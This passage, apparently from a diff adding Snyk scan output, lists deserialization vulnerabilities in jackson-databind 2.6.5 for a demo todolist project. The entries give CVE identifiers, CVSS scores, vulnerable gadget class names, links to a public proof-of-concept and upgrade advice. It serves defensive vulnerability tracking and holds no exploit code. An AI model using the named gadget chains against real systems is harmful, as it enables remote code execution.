"CVSS", + "modificationTime": "2024-03-11T09:51:24.705041Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056419", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3003", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:49:18.170866Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.831271Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.268380Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:18.170866Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.831271Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.docx4j.org.apache.xalan.lib.sql.JNDIConnectionPool`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3003)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36183" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:11:36.206859Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:10:25Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:34.627750Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.831271Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056420", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/Al1ex/CVE-2020-36179", + "title": "Al1ex's Poc" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3004", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:59.448286Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.759947Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.319616Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:59.448286Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.759947Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [Al1ex's Poc](https://github.com/Al1ex/CVE-2020-36179)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.72318", + "probability": "0.00357", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36179" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:29:22.463416Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:12:59Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:34Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.759947Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056421", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3004", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-36179", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:38.913838Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.693276Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.436792Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.913838Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.693276Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36179)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36182" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:30:54.237288Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:30:00Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:35Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.693276Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056424", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2998", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:39.244182Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:01.307628Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.622591Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:39.244182Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:01.307628Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2998)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36185" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:36:40.536722Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:34:52Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:33.303463Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:01.307628Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056425", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[, 2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2996", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:00.658291Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.824076Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:42.513059Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:00.658291Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.824076Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects 